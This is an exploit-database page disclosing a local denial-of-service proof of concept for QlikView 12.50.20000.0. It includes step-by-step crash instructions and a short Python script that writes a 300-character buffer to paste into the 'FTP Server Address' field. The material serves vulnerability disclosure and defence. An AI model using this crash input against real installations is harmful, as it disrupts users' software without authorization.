header-logo
Suggest Exploit
vendor:
QlikView
by:
Luis Martinez
7.5
CVSS
HIGH
Denial of Service (DoS) Local
CWE
Product Name: QlikView
Affected Version From: 12.50.20000.0
Affected Version To: 12.50.20000.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Pro x64
2020

QlikView 12.50.20000.0 – ‘FTP Server Address’ Denial of Service (PoC)

This exploit allows an attacker to crash the QlikView 12.50.20000.0 software by sending a specially crafted FTP server address. By pasting a large buffer of 'A' characters into the 'FTP Server Address' field, the software crashes, resulting in a denial of service.

Mitigation:

Apply the latest patch or update from the vendor to fix the crash issue.
Source

Exploit-DB raw data:

# Exploit Title: QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2020-08-03
# Vendor Homepage: https://www.qlik.com
# Software Link: https://www.qlik.com/us/trial/qlik-sense-business
# Tested Version: 12.50.20000.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash:
# 1.- Run python code: QlikView_12.50.20000.0.py
# 2.- Open QlikView_12.50.20000.0.txt and copy content to clipboard
# 3.- Open "QlikView 12"
# 4.- File -> "Open FTP ..."
# 5.- Paste ClipBoard on "FTP Server Address"
# 6.- Connect
# 7.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 300
f = open ("QlikView_12.50.20000.0.txt", "w")
f.write(buffer)
f.close()